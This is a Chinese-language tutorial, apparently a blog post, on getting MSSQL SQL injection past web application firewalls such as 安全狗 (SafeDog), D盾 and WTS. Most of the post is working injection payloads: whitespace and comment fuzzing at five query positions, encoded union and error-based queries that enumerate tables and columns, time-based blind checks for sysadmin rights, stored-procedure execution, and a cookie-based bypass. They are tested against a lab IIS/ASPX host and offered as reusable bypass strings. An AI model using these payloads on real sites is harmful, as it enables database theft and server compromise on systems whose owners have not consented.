丶ershiyi
丶ershiyi

MSSQL注入绕过

目录:

  • 绕过特性
    • 前言
    • 测试
    • 常见函数
  • 绕WAF\-WTS
  • 绕安全狗
    • 简介
    • 简单的爆错bypass
    • 简单的联合bypass
    • 盲注与储存过程
    • 其他绕过语句:
  • 绕D盾

绕过特性

前言

我们经常利用一些数据库特性来进行WAF绕过。

在MSSQL中,比如可以这样:

  • 浮点数形式:id=1.1union select

  • 科学计数法形式:id=1e0union select

  • 但其实还可以这样子:id=1.eunion select

通过1.e这样的形式,可以用它绕过D盾的SQL注入防护,通过简单的Fuzz,我们来一起探索一下MSsql特性。

测试

常见有5个位置即:select * from admin where id=1【位置一】union【位置二】select【位置三】1,2,db_name()【位置四】from【位置五】admin

  • 位置一:参数和union之间的位置

    (1)空白字符

    Mssql可以利用的空白字符有:

    • 01,02,03,04,05,06,07,08,09,0A,0B,0C,0D,0E,0F,10,11,12,13,14,15,16,17,18,19,1A,1B,1C,1D,1E,1F,20

    • /**/

    • +

    • %0a

    (2)注释符号

    • /**/

    • /*

    • --

    • ;%00

    (3)浮点数

    select * from admin where id=1.1union select 1,‘2’,db_name() from admin

    (4)1E0的形式:

    select * from admin where id=1e0union select 1,‘2’,db_name() from admin

    (5)运算符

    包括加(+)、减(-)、乘(*)、除(/)、求于(%)、位与(&)、位或(|)、位异或(^)

    select username,password,id from admin where id=1-1union select ‘1’,system_user,3 from admin

    select username,password,id from admin where id=1e-union select ‘1’,system_user,3 from admin

    (6)小区别:

    ASPX:[0x00-0x20]、ox2e、[0x30-0x39]、ox45、ox65、[0x80-0xff]、运算符

    ASP: [0x01-0x20]、ox2e、[0x30-0x39]、ox45、ox65、运算符

    单引号:select username,password,id from admin where id=1 and '1’like’1’union select null,null,null

  • 位置二:union和select之间的位置

    (1)空白字符

    Mssql可以利用的空白字符有: 01,02,03,04,05,06,07,08,09,0A,0B,0C,0D,0E,0F,10,11,12,13,14,15,16,17,18,19,1A,1B,1C,1D,1E,1F,20

    (2)注释符号

    Mssql也可以使用注释符号/**/

    (3)其他符号

    : %3a 冒号

    select * from admin where id=1 union:select 1,‘2’,db_name() from:admin

    ASPX:[0x00-0x20]、0x3a、[0x80-0xff]要组合前面的两个才能执行,如%3a%a0、%a0%0a

    ASP: [0x01-0x20] 、0x3a

  • 位置三:select和查询参数之间的位置

    (1)空白字符

    Mssql可以利用的空白字符有: 01,02,03,04,05,06,07,08,09,0A,0B,0C,0D,0E,0F,10,11,12,13,14,15,16,17,18,19,1A,1B,1C,1D,1E,1F,20

    (2)注释符号

    Mssql也可以使用注释符号/**/

    (3)其他符号

    %2b + select * from admin where id=1 union select+1,‘2’,db_name() from admin

    %2d - select * from admin where id=1 union select-1,‘2’,db_name() from admin

    %2e . select * from admin where id=1 union select.1,‘2’,db_name() from admin

    %3a : select * from admin where id=1 union select:1,‘2’,db_name() from admin

    %7e ~ select * from admin where id=1 union select~1,‘2’,db_name() from admin

  • 位置四:查询参数和from之间的位置

    (1)空白字符

    Mssql可以利用的空白字符有: 01,02,03,04,05,06,07,08,09,0A,0B,0C,0D,0E,0F,10,11,12,13,14,15,16,17,18,19,1A,1B,1C,1D,1E,1F,20

    (2)注释符号

    Mssql也可以使用注释符号/**/

    (3)其他符号

    ASP: [0x01-0x20]、0x2e、[0x30-0x39]、0x45、0x65、[0x80-0xff]

    ASPX:[0x00-0x20]、0x2e、[0x30-0x39]、0x45、0x65、

    id=1%20union%20select%201,‘2’,db_name()%80from%20admin

    db_name与()中间 %00-%20 %80-%ff填充

    id=1 union select 1,‘2’,db_name+() from admin

  • 位置五:from后面的位置

    (1)空白字符

    Mssql可以利用的空白字符有: 01,02,03,04,05,06,07,08,09,0A,0B,0C,0D,0E,0F,10,11,12,13,14,15,16,17,18,19,1A,1B,1C,1D,1E,1F,20

    (2)注释符号

    Mssql也可以使用注释符号/**/

    (3)其他符号

    : %3a select * from admin where id=1 union:select 1,‘2’,db_name() from:admin

    . %2e select * from admin where id=1 union select 1,‘2’,db_name() from.information_schema.SCHEMATA

    ASP: [0x01-0x20]、0x2e、0x3a

    ASPX: [0x00-0x20]、0x2e、0x3a、[0x80-0xff]

常见函数

类型一、字符串截取函数

  • Substring(@@version,1,1)

  • Left(@@version,1)

  • Right(@@version,1)

  • charindex(‘test’,db_name())

类型二:字符串转换函数

  • Ascii(‘a’)

  • Char(‘97’) 这里的函数可以在括号之间添加空格的,一些waf过滤不严会导致bypass

类型三:其他方式

  • 利用存储过程

  • mssql的存储过程定义为:

  • `Declare @s varchar(5000) ``//申明变量@s 类型为varchar(5000)``Set @ ``//给@s变量赋值``Exec(@s) ``//执行@s`

  • id=1;Exec(‘WA’+‘ITFOR DELAY ‘‘0:0:5’’’)

  • id=1;declare @test nvarchar(50);set @test=‘wait’+‘for delay ‘‘0:0:5’’’;exec sp_executesql @test

绕WAF-WTS

不允许存在引号,替换成hex或者char即可,云锁似乎也可以

id=3 %u0061%u006e%u0064%u0020%u0031%u003d%u0028%u0073%u0065%u006c%u0065%u0063%u0074%u0020%u0074%u006f%u0070%u0020%u0031%u0020%u006e%u0061%u006d%u0065%u0020%u0066%u0072%u006f%u006d%u0020%u0073%u0079%u0073%u006f%u0062%u006a%u0065%u0063%u0074%u0073%u0020%u0077%u0068%u0065%u0072%u0065%u0020%u0078%u0074%u0079%u0070%u0065%u003d%u0030%u0078%u0035%u0035%u0029

转码:http://tool.chinaz.com/tools/unicode.aspx

绕安全狗

简介

BYPASS我们可以利用ASP/ASPX IIS 等容器的特性,和脚本语言的特性绕过,比如ASPX的hpp,iis处理%符号的机制。

简单的爆错bypass

测试环境 IIS+ASPX+MMSQL+IIS安全狗4.0.2229

简单的判断语句测试

  • and 不拦截

  • and 1 拦截

  • and -1 不拦截

  • and -1=-1 不拦截

  • and ~1 不拦截

  • and ~1=1 拦截

  • and 1=1 不拦截

差不多判断下 安全狗对负数不是很敏感,对数学运算后的布尔值也不是敏感

and这块绕过了就可以爆出一些基本的信息了,比如用db_name()、user和@@version 都是可以直接用的,并不会被拦截,至少在我这个版本的狗是这样。

  • and @@version>~1

  • and (user|1)>-1

  • and (db_name()|1)>.1

我们试试直接通过mssql的一些特性来绕过,爆表名的语句

  • and ~1=(select top 1 name from sysobjects where xtype=‘u’ and name !=‘info’);-- 拦截

  • and ~1=(select top 1 name from);-- 不拦截

  • and ~1=(select top 1 name from 1);-- 拦截

  • and ~1=(select top 1 name from a);-- 拦截

  • and ~1=(select top 1 name from !);-- 不拦截

可见安全狗在这里拦截的是我们from后面跟字符型或者数字型,我们就只需要找到一个符号来包裹他就可以,在mssql中可以包裹表库名称的符号是[]

  • and ~1=(select top 1 name from[sysobjects]);--

确实也不拦截继续往后测试

  • and ~1=(select top 1 name from[sysobjects] where xtype=‘u’);-- 拦截

  • and ~1=(select top 1 name from[sysobjects] where xtype=);-- 不拦截

很简单我们在mssql中可以用char 和hex 来编码我们的表名

  • and ~1=(select top 1 name from[sysobjects] where xtype=0x75);--

基本上已经绕过了我们的爆出第一个表名的目的,假如要爆其他的表名 测试发现也是拦截 引号字符而已 用相同的方法绕过即可

  • and ~1=(select top 1 name from[sysobjects] where xtype=0x75 and name not in (CHAR(105)%2BCHAR(110)%2BCHAR(102)%2BCHAR(111),CHAR(97)%2BCHAR(100)%2BCHAR(109)%2BCHAR(105)%2BCHAR(110)));

MSSQL注入绕过_第1张图片

其实还有一种方法爆表名利用INFORMATION_SCHEMA,但是安全狗有个设置直接拦截这个关键词,但是不是默认开启的,顺便提一下

  • http://192.168.130.137/1.aspx?id=1 and ~1=(select top 1 table name from [INFORMATIONSCHEMA].[TABLES] where table_name not in (char(105)%2Bchar(110)%2Bchar(102)%2Bchar(111)));--

简单的联合bypass

union/!1113/

联合注入感觉是个非常简单的bypass过程,因为安全狗的规则把mysql和mssql混为一谈

  • union 不拦截

  • union select 拦截

  • unionselect 拦截

感觉是不是已经很绝望没办法绕过了,不妨试试注释,虽然mssql没有内联注释

  • union/select/ 不拦截

  • union/!select/ 拦截

  • union/!1select/ 不拦截

我们试试闭合他,他还拦截不

  • union/!1/select--*/ 不拦截

我们的最终的payload也构造好了

  • http://192.168.130.137/1.aspx?id=1 union/ !1/select null,name,null from [info]--*/
    MSSQL注入绕过_第2张图片

盲注与储存过程

我们前面讲过mysql的一个绕过手法就是注释加换行,这个其实在mssql中也是成立的,所以直接构造payload

  • http://192.168.130.137/1.aspx?id=1--/%0aif (select IS_SRVROLEMEMBER(‘sysadmin’))=1 WAITFOR DELAY ‘0:0:5’--%20/

储存过程

  • http://192.168.130.137/1.aspx?id=1--/%0aexec xpcreatesubdir ‘c:\text’--%20/

你可以把当做万能bypass语句,里面的任何代码安全狗都不会拦截

--------------------------------------------------------------------------------------

其他绕过语句:

  • id=3 and -2<-1

  • id=3 and @@version>~1

  • id=3 and (user|1)>-1

  • id=3 and (db_name()|1)>.1

  • id=3 order%01by 1

  • id=3 and%01(select host_name/**/())<0--

  • id=3 and%01(select name from %01master%01.%01dbo%01.sysdatabases where dbid=7)<0--

  • id=3 and%01(select top 1 name from%01 bbs.%01dbo%01.sysobjects where xtype=0x55)<0--

  • id=3 and%01(select name from%01 sysobjects where xtype=0x55 FOR XML PATH)<0--

  • id=3 and%01(select name from%01 sysobjects where xtype=char(85) FOR XML PATH)<0--

  • id=3 and%01(select table_name from%01 information_schema.tables FOR XML PATH)<0--

安全狗屏蔽单引号,接下来必须比较麻烦的方式爆列名,如下变化0来遍历当前库中所有列名,然后查询admin表中是否有ID的列名

  • id=3 and%01(select top 1 column_name from%01 information_schema.columns where column_name not in(select top 0 column_name from%01 information_schema.columns))<0--

  • id=3 and%01exists(select ID from%01 admin)<0--

用char不需要上述方法

  • id=3 and%01(select name from%01 syscolumns where id=object_id(char(116)%2bchar(98)%2bchar(97)%2bchar(100)%2bchar(109)%2bchar(105)%2bchar(110)%2bchar(117)%2bchar(115)%2bchar(101)%2bchar(114)) FOR XML PATH)>1

查数据

  • id=3 and%01(select top 1 ID from%01 admin)<0--

  • id=3 and ~1=(select top 1 name from[sysobjects]);--

  • id=-1 union%01all%01select null,null,null from%01 master.%01dbo%01.sysdatabases

自定义变量

  • id=3;declare%01 @s varchar(2000) set @s=0x73656c65637420636f6e7665727428696e742c404076657273696f6e29 exec(@s)--

绕D盾

旧版本D盾对cookie是不拦截的

新版本测试得出D盾对cookie是拦截的。

把传输数据的方式改成表单形式

MSSQL注入绕过_第3张图片
cookie代入payload
MSSQL注入绕过_第4张图片

你可能感兴趣的:(漏洞利用,MSSQL,MSSQL注入,注入绕过)

  • python使用SQLAlchemy进行mysql的ORM操作 Lucas在澳洲 Pythonpythonmysql开发语言1024程序员节
    SQLAlchemy是什么SQLAlchemy是一个强大的PythonORM(对象关系映射)库,用于简化与关系型数据库的交互。通过将数据库表映射为Python类,SQLAlchemy使得开发者能够通过面向对象的方式来进行数据库操作,避免了直接使用SQL语句所带来的复杂性和安全风险。1.为什么使用ORM使用ORM具有以下优势:避免SQL注入:通过使用参数化查询,ORM可以有效地防止SQL注入攻击。可
  • 安全面试1 白初& 面试题目总结安全面试网络
    目录渗透的流程信息收集如何处理子域名爆破的泛解析问题泛解析判断泛解析的存在处理泛解析的策略如何绕过CDN查找真实ipphpinfo中常见的敏感信息权限维持Windows权限维持Linux权限维持技术跨平台权限维持技术检测和防御输出到href的XSS如何防御samesite防御CSRF的原理SameSite的工作原理CSRF防御json格式的CSRF如何防御浏览器解析顺序和解码顺序解析顺序解码顺序过
  • Dest1ny漏洞库:用友 U8-CRM 系统 ajaxgetborrowdata.php 存在 SQL 注入漏洞 Dest1ny(信息安全业务随时dd) phpsql开发语言web安全经验分享安全网络安全
    大家好,今天是Dest1ny漏洞库的专题!!会时不时发送新的漏洞资讯!!大家多多关注,多多点赞!!!用友U8-CRM系统ajaxgetborrowdata.php存在SQL注入漏洞,文件多个方法存在SQL注入漏洞,未经身份验证的攻击者通过漏洞执行任意SQL语句,调用xp_cmdshell写入后门文件,执行任意代码,从而获取到服务器权限。hunterapp.name="用友CRM"fofatitle
  • 2025 民营企业座谈会重要讲话:为民营经济发展注入强劲动力 莱歌数字 #数智科学研究#职场经验职场经验产品经理智能制造经验分享人工智能
    作者简介:科技自媒体优质创作者个人主页:莱歌数字-CSDN博客公众号:莱歌数字个人微信:yanshanYH211、985硕士,职场15年+从事结构设计、热设计、售前、产品设计、项目管理等工作,涉足消费电子、新能源、医疗设备、制药信息化、核工业等领域涵盖新能源车载与非车载系统、医疗设备软硬件、智能工厂等业务,带领团队进行多个0-1的产品开发,并推广到多个企业客户现场落地实施。专题课程Flotherm
  • 启动pip或ipython提示Fatal error in launcher: Unable to create process的解决方法 simple_whu pythonpipipythonpython
    错误以及原因分析有时,运行python的pip或ipython组件会报错:Fatalerrorinlauncher:Unabletocreateprocessusing'"C:\third_party\Python\3.9\win64-msvc-14.2\python.exe"错误信息最后这一串路径在我们的电脑上很可能并不存在!然而,启动pip或ipython时又会尝试运行这个路径的python.
  • 6种最新算法(小龙虾优化算法COA、螳螂搜索算法MSA、红尾鹰算法RTH、新雀优化算法NOA、鳑鲏鱼优化算法BFO、蜘蛛蜂优化算法SWO)求解机器人路径规划(提供MATLAB代码) IT猿手 机器人路径规划优化算法无人机路径规划算法机器人matlab宽度优先开发语言人工智能前端
    一、机器人路径规划介绍移动机器人(Mobilerobot,MR)的路径规划是移动机器人研究的重要分支之,是对其进行控制的基础。根据环境信息的已知程度不同,路径规划分为基于环境信息已知的全局路径规划和基于环境信息未知或局部已知的局部路径规划。随着科技的快速发展以及机器人的大量应用,人们对机器人的要求也越来越高,尤其表现在对机器人的智能化方面的要求,而机器人自主路径规划是实现机器人智能化的重要步骤,路
  • javascript当中insertBefore的用法 qq_44594371 javascriptjavascriptinsertBeforeinsertBefore
    例1.3(insertBeforeIEFF.html)1111msgtest222aaaaaaaaendinsertedNodevarinsertedNode=document.getElementById("insertedNode");varaaa=document.getElementById("aaa");vartest=document.getElementById("contain")
  • Databases for Management Information Systems 后端
    DatabasesforManagementInformationSystemsAssignment1AssignmentType:PercentageofModuleMark:DueDate:Title:TheDevelopmentandroleofDatabaseManagementSystemsaspartoftheDecision-MakingIndividualReportandDBMS
  • CMSC 150 Simple Chatbot 后端
    SimpleChatbotCMSC150-[01/02]-Spring2025-Project1IntroductionMostAIagents,particularlychatbots(seeELIZA,oneofthefirstchatbotsandEugeneGootsman,thefirstchatbottopasstheTuringTest),arereallyjustmadeupofc
  • 深入了解 AppScan 工具的使用:筑牢 Web 应用安全防线 垚垚 Securify 前沿站 十大漏洞网络安全前端web安全系统安全运维
    前言IBMAppScan作为一款业界领先的Web应用程序安全测试工具,就像一位专业的“安全卫士”,能够精准高效地识别并协助修复各类安全漏洞,为应用安全保驾护航。接下来,让我们一同深入探索AppScan的使用奥秘。一、探秘AppScan:功能与原理剖析AppScan的核心功能是模拟黑客的多样化攻击手段,对Web应用程序展开全方位、无死角的深度扫描,从而揪出隐藏其中的SQL注入、跨站脚本(XSS)、文
  • a2,3-唾液酸转移酶|a2,3- sialyltransferase (PmST1) 陕西星贝爱科 网络网络协议udp
    a2,3-唾液酸转移酶是一种重要的酶类,以下是对其的详细介绍:一、基本信息a2,3-唾液酸转移酶,通常被称为PmST1,是一种催化唾液酸在α2,3-键从其激活形式(如胞苷单磷酸N-乙酰神经氨酸,CMP-Neu5Ac)转移到糖蛋白或糖脂的末端半乳糖残基的酶。这种酶在生物体内广泛存在,包括细菌在内的某些生物体中都有其身影,并在唾液化糖缀合物的生物合成中发挥关键作用。二、生理功能a2,3-唾液酸转移酶的
  • 基于eBPF的智能诊断平台:实现云原生系统的自愈型运维体系 桂月二二 云原生运维
    引言:从被动运维到预测性自愈的进化当某电商平台通过eBPF实时诊断系统提前48小时预测到MySQL集群的锁竞争风暴时,其核心是千万级指标粒度的内核状态分析与AI驱动的根因定位算法的结合。运维数据显示,该平台将平均故障恢复时间(MTTR)从23分钟压缩到71秒,并自动修复了87%的异常事件。通过动态注入修复策略,集群CPU毛刺现象减少了94%,开创了智能运维的新纪元。一、传统可观测性工具的桎梏1.1
  • 如何查看自己电脑是什么架构 F—— 运维学习运维安全
    1.win+R打开运行,输入msinfo32,回车。2.弹出系统信息面板,“系统类型”显示架构类型;如果显示“基于x64的电脑”,则你的操作系统是64位的,通常对应的是AMD架构;如果显示“基于ARM的电脑”,则你的操作系统是ARM架构的。
  • iOS 获取设备占用内存 Johnny Tong iOS之旅ios内存HOST_VM
    获取应用占用内存获取应用进程占用内存-(NSUInteger)memoryUsage{task_vm_info_data_tvmInfo;mach_msg_type_number_tcount=TASK_VM_INFO_COUNT;kern_return_tresult=task_info(mach_task_self(),TASK_VM_INFO,(task_info_t)&vmInfo,&co
  • 使用 python框架FastAPI搭配Nacos 构建网关服务 xiaohu9606 pythonfastapi数据库
    文章目录概要整体架构流程技术细节小结概要本文将详细介绍如何使用FastAPI构建一个功能强大的网关服务,该网关服务能够处理认证、路由转发和日志记录等功能。我们将基于提供的代码文件进行分析,并对代码进行必要的优化和补充。整体架构流程数据库模型(base.py)fromtypingimportListfromsqlalchemyimportor_fromsqlalchemy.excimportSQLA
  • 【Elasticsearch】多索引(数据流)搜索 risc123456 Elasticsearchelasticsearch
    在Elasticsearch中,搜索多个数据流(datastreams)和索引(indices)是一个常见的操作,尤其是在处理大规模数据或跨多个数据源进行查询时。以下是关于如何使用查询来搜索多个数据流和索引的详细说明,包括方法、示例和一些高级特性。---1.为什么需要搜索多个数据流和索引?在实际应用中,数据可能会分散在多个索引或数据流中,例如:•日志数据按日期或服务类型分隔到不同的索引。•数据流用
  • 文件上传绕过 clown_YZ 网络安全
    1.准备upload-labs靶场(此篇文章仅针对pass-20)2.打开pass-20并查看上传代码3.对上传代码进行分析$is_upload=false;$msg=null;if(!empty($_FILES['upload_file'])){//检查MIME$allow_type=array('image/jpeg','image/png','image/gif');if(!in_array
  • Linux 磁盘满了怎么办?快速排查和清理方法 网硕互联的小客服 服务器运维linux云计算
    当Linux磁盘满了,会导致系统无法正常运行,比如无法写入文件、服务停止、甚至系统崩溃。因此,快速排查并清理磁盘空间是非常重要的。以下是详细的排查和解决步骤:一、快速定位磁盘占用原因1.检查磁盘使用情况使用df命令查看磁盘分区的使用情况:bash复制df-h参数说明:-h:以人类可读的格式显示(GB、MB)。输出示例:plaintext复制FilesystemSizeUsedAvailUse%Mo
  • Java面试宝典:说下Spring Bean的生命周期? 熊文豪 Java面试宝典java面试springSpringBeanBeanBean的生命周期
    Java面试宝典专栏范围:JAVA基础,面向对象编程(OOP),异常处理,集合框架,JavaI/O,多线程编程,设计模式,网络编程,框架和工具等全方位面试题详解每日更新Java面试宝典专栏:Java面试宝典感兴趣的可以先收藏起来,大家在遇到JAVA面试题等相关问题都可以给我留言咨询,希望帮助更多的人回答重点实例化:Spring容器根据配置文件或注解实例化Bean对象。属性注入:Spring将依赖(
  • CentOS 7 系统为 python3 安装 sqlite3 中兔西维亚 pythonLinuxcentossqlite服务器
    故事背景pythontest2.pyTraceback(mostrecentcalllast):File"test2.py",line4,inimportsqlite3File"/home/dongxw/usr/lib/python3.6/sqlite3/__init__.py",line23,infromsqlite3.dbapi2import*File"/home/dongxw/usr/lib
  • 抛弃手册,开启TongWeb+TongLINK/Q的开发方式 萝卜白菜。 webjavajms
    问题:当使用TongWeb+TongLINK/Q产品,想用JMS开发消息服务时,不知如何使用?1.当你看TongLINK/Q手册《JMS编程参考》时,在给你讲TongWeb5.0+TongLINK/Q8.1的消息驱动bean(Message-DrivenBean,MDB)配置。2.当你去看TongWeb7的《用户手册》时,在给你讲TongWeb7.0+TongLINK/Q8.1的消息驱动bean(
  • tonglink/q8 jms启动 libapr-2.so.0 问题 jtao518 linux运维服务器
    启动(前题是设置好环境变量执行setp,如果不行就把内容复制到用户的配置文件中执行:tlq启动报:tlq/TLQ8/bin/tl_jmsbroker:errorwhileloadingsharedlibraries:libapr-2.so.0:cannotopensharedobjectfile:Nosuchfileordirectory解决:cpTLQ8/lib/libapr-2*/usr/li
  • Jenkins Pipeline 中通过勾选参数来控制是否构建 Docker 镜像 行路见知 jenkinsdocker运维
    1.定义参数:使用booleanParam定义一个布尔参数,示例如下booleanParam(name:'BUILD_DOCKER',description:'是否构建Docker镜像',defaultValue:false)2.使用参数:在stage中,根据参数的值决定构建方式:stage('编译打包'){steps{script{if(params.BUILD_DOCKER){echo"Bui
  • 基于 Spring Cloud + Sentinel 的全面流量治理方案 power-辰南 java技术架构师成长专栏springcloudsentinelspring流量治理
    一、精准评估系统最大负载1.流量建模历史日志分析流量特征提取业务场景拆解流量模型构建容量预测模型实施方法:使用ELK分析6个月Nginx日志,提取分时/分业务QPS曲线构建典型场景模型:日常流量(正态分布)、促销流量(脉冲模型)、恶意攻击(毛刺识别)容量公式:单实例容量=(CPU核心数*1000ms)/平均RT(ms)2.数据模拟与环境搭建#使用tcpcopy复制生产流量./tcpcopy-x80
  • CVE-2024-34527 D-Link DSL-3782命令注入漏洞复现_dsl-3782_a1_eu_1(1) 2401_84009698 程序员嵌入式
    一、漏洞描述CVE-2022-34527D-LinkDSL-3782v1.03及以下版本被发现包含通过函数byte_4C0160的命令注入漏洞,根据已知公开在cfg_manger文件的代码sub_474c78函数中,byte_4C0160作为system的参数执行。固件地址:https://media.dlink.eu/support/products/dsl/dsl-3782/driver_so
  • 【Java实现数组的插入优化】 长安归故里♬ java算法开发语言
    头插,尾插的插入效率在之前的插入中是【直接让currentIndex++我们在填入数据】现在我们把他们分为头插和尾插和中间插入中间插入:【在插入index的位置以后移动一位然后在index的位置中插入我们的数据】publicvoidadd(intdata,intindex){//是否扩容currentIndex++;if(currentIndex>nums.length-2){inttager[]
  • 如何用示波器的FFT计算功能抓取电机驱动DS两极间的辐射干扰源 Xyc0317_ 硬件EMC单片机嵌入式硬件
    1.硬件连接与准备探头选择:使用高带宽探头(至少为信号最高频率的3倍,例如1GHz探头用于300MHz干扰)。接地方式:采用探头接地弹簧而非长接地夹,缩短接地回路,减少引入噪声。差分测量(可选):若干扰为共模噪声,建议使用差分探头直接测量DS两极间电压。接线要点:尽量缩短探头与被测点的距离,避免环路天线效应。确保电机驱动电路处于正常工作状态(如PWM信号开启)。2.示波器参数设置(以泰克MSO5/
  • 2024年9月电子学会青少年软件编程Python等级考试(五级)真题试卷 No0d1es 青少年软件编程(Python)等级考试试卷python开发语言电子学会青少年编程五级六级
    2024年9月青少年软件编程Python等级考试(五级)真题试卷一、选择题第1题以下哪个方法用于向字典中添加或修改键值对?()A.dict.append()B.dict.update()C.dict.remove()D.dict.insert()第2题下列哪个操作不是字典类型的标准方法或属性?()A.dict.keys()B.dict.getall()C.dict.items()D.dict.va
  • 大卫·李嘉图(David Ricardo,1772-1823):奠定现代经济学基础的古典经济学家(中英双语) 阿正的梦工坊 Finance金融
    大卫·李嘉图:奠定现代经济学基础的古典经济学家1.引言:谁是大卫·李嘉图?大卫·李嘉图(DavidRicardo,1772-1823)是19世纪最重要的古典经济学家之一,与亚当·斯密(AdamSmith)和约翰·斯图亚特·密尔(JohnStuartMill)并称为古典经济学三巨头。他最著名的贡献包括:✅比较优势理论——解释了国际贸易的核心逻辑,为全球化奠定了基础。✅地租理论——分析了土地收益的变化
  • 盘点:哪些科技公司接入了DeepSeek,它们在做什么? 人工智能深度学习
    在人工智能蓬勃发展的当下,DeepSeek以其独特的技术优势和创新理念,吸引了众多科技公司的目光,成为行业内广泛接入的对象。这些公司与DeepSeek的合作,不仅为自身业务注入了新的活力,也推动了AI技术在更多领域的落地应用。下面,就让我们一同盘点接入DeepSeek的科技公司及其接入情况和功能。互联网巨头:百度与腾讯百度:搜索与智能体平台的全面升级2月16日晚,百度搜索和文心智能体平台宣布全面接
  • 如何用ruby来写hadoop的mapreduce并生成jar包 wudixiaotie mapreduce
    ruby来写hadoop的mapreduce,我用的方法是rubydoop。怎么配置环境呢: 1.安装rvm:     不说了 网上有 2.安装ruby:     由于我以前是做ruby的,所以习惯性的先安装了ruby,起码调试起来比jruby快多了。 3.安装jruby:     rvm install jruby然后等待安
  • java编程思想 -- 访问控制权限 百合不是茶 java访问控制权限单例模式
    访问权限是java中一个比较中要的知识点,它规定者什么方法可以访问,什么不可以访问   一:包访问权限;   自定义包: package com.wj.control; //包 public class Demo { //定义一个无参的方法 public void DemoPackage(){ System.out.println("调用
  • [生物与医学]请审慎食用小龙虾 comsci 生物
         现在的餐馆里面出售的小龙虾,有一些是在野外捕捉的,这些小龙虾身体里面可能带有某些病毒和细菌,人食用以后可能会导致一些疾病,严重的甚至会死亡.....      所以,参加聚餐的时候,最好不要点小龙虾...就吃养殖的猪肉,牛肉,羊肉和鱼,等动物蛋白质     
  • org.apache.jasper.JasperException: Unable to compile class for JSP: 商人shang maven2.2jdk1.8
    环境: jdk1.8    maven  tomcat7-maven-plugin  2.0 原因: tomcat7-maven-plugin  2.0 不知吃 jdk 1.8,换成 tomcat7-maven-plugin  2.2就行,即     <plugin>
  • 你的垃圾你处理掉了吗?GC oloz GC
    前序:本人菜鸟,此文研究学习来自网络,各位牛牛多指教  1.垃圾收集算法的核心思想   Java语言建立了垃圾收集机制,用以跟踪正在使用的对象和发现并回收不再使用(引用)的对象。该机制可以有效防范动态内存分配中可能发生的两个危险:因内存垃圾过多而引发的内存耗尽,以及不恰当的内存释放所造成的内存非法引用。   垃圾收集算法的核心思想是:对虚拟机可用内存空间,即堆空间中的对象进行识别
  • shiro 和 SESSSION 杨白白 shiro
    shiro 在web项目里默认使用的是web容器提供的session,也就是说shiro使用的session是web容器产生的,并不是自己产生的,在用于非web环境时可用其他来源代替。在web工程启动的时候它就和容器绑定在了一起,这是通过web.xml里面的shiroFilter实现的。通过session.getSession()方法会在浏览器cokkice产生JESSIONID,当关闭浏览器,此
  • 移动互联网终端 淘宝客如何实现盈利 小桔子 移動客戶端淘客淘寶App
           2012年淘宝联盟平台为站长和淘宝客带来的分成收入突破30亿元,同比增长100%。而来自移动端的分成达1亿元,其中美丽说、蘑菇街、果库、口袋购物等App运营商分成近5000万元。 可以看出,虽然目前阶段PC端对于淘客而言仍旧是盈利的大头,但移动端已经呈现出爆发之势。而且这个势头将随着智能终端(手机,平板)的加速普及而更加迅猛
  • wordpress小工具制作 aichenglong wordpress小工具
    wordpress 使用侧边栏的小工具,很方便调整页面结构 小工具的制作过程 1 在自己的主题文件中新建一个文件夹(如widget),在文件夹中创建一个php(AWP_posts-category.php) 小工具是一个类,想侧边栏一样,还得使用代码注册,他才可以再后台使用,基本的代码一层不变 <?php class AWP_Post_Category extends WP_Wi
  • JS微信分享 AILIKES js
    // 所有功能必须包含在 WeixinApi.ready 中进行    WeixinApi.ready(function(Api) {        // 微信分享的数据            var wxData = {       &nb
  • 封装探讨 百合不是茶 JAVA面向对象 封装
    //封装   属性 方法 将某些东西包装在一起,通过创建对象或使用静态的方法来调用,称为封装;封装其实就是有选择性地公开或隐藏某些信息,它解决了数据的安全性问题,增加代码的可读性和可维护性   在 Aname类中申明三个属性,将其封装在一个类中:通过对象来调用   例如   1: //属性 将其设为私有 姓名 name 可以公开
  • jquery radio/checkbox change事件不能触发的问题 bijian1013 JavaScriptjquery
    我想让radio来控制当前我选择的是机动车还是特种车,如下所示:  <html> <head> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js" type="text/javascript"><
  • AngularJS中安全性措施 bijian1013 JavaScriptAngularJS安全性XSRFJSON漏洞
            在使用web应用中,安全性是应该首要考虑的一个问题。AngularJS提供了一些辅助机制,用来防护来自两个常见攻击方向的网络攻击。 一.JSON漏洞         当使用一个GET请求获取JSON数组信息的时候(尤其是当这一信息非常敏感,
  • [Maven学习笔记九]Maven发布web项目 bit1129 maven
    基于Maven的web项目的标准项目结构 user-project     user-core     user-service     user-web        src      
  • 【Hive七】Hive用户自定义聚合函数(UDAF) bit1129 hive
    用户自定义聚合函数,用户提供的多个入参通过聚合计算(求和、求最大值、求最小值)得到一个聚合计算结果的函数。 问题:UDF也可以提供输入多个参数然后输出一个结果的运算,比如加法运算add(3,5),add这个UDF需要实现UDF的evaluate方法,那么UDF和UDAF的实质分别究竟是什么?   Double evaluate(Double a, Double b)  
  • 通过 nginx-lua 给 Nginx 增加 OAuth 支持 ronin47
    前言:我们使用Nginx的Lua中间件建立了OAuth2认证和授权层。如果你也有此打算,阅读下面的文档,实现自动化并获得收益。SeatGeek 在过去几年中取得了发展,我们已经积累了不少针对各种任务的不同管理接口。我们通常为新的展示需求创建新模块,比如我们自己的博客、图表等。我们还定期开发内部工具来处理诸如部署、可视化操作及事件处理等事务。在处理这些事务中,我们使用了几个不同的接口来认证: &n
  • 利用tomcat-redis-session-manager做session同步时自定义类对象属性保存不上的解决方法 bsr1983 session
    在利用tomcat-redis-session-manager做session同步时,遇到了在session保存一个自定义对象时,修改该对象中的某个属性,session未进行序列化,属性没有被存储到redis中。 在 tomcat-redis-session-manager的github上有如下说明: Session Change Tracking As noted in the &qu
  • 《代码大全》表驱动法-Table Driven Approach-1 bylijinnan java算法
    关于Table Driven Approach的一篇非常好的文章: http://www.codeproject.com/Articles/42732/Table-driven-Approach package com.ljn.base; import java.util.Random; public class TableDriven { public
  • Sybase封锁原理 chicony Sybase
           昨天在操作Sybase IQ12.7时意外操作造成了数据库表锁定,不能删除被锁定表数据也不能往其中写入数据。由于着急往该表抽入数据,因此立马着手解决该表的解锁问题。     无奈此前没有接触过Sybase IQ12.7这套数据库产品,加之当时已属于下班时间无法求助于支持人员支持,因此只有借助搜索引擎强大的
  • java异常处理机制 CrazyMizzz java
    java异常关键字有以下几个,分别为 try catch final throw throws 他们的定义分别为 try:    Opening exception-handling statement. catch:  Captures the exception. finally: Runs its code before terminating
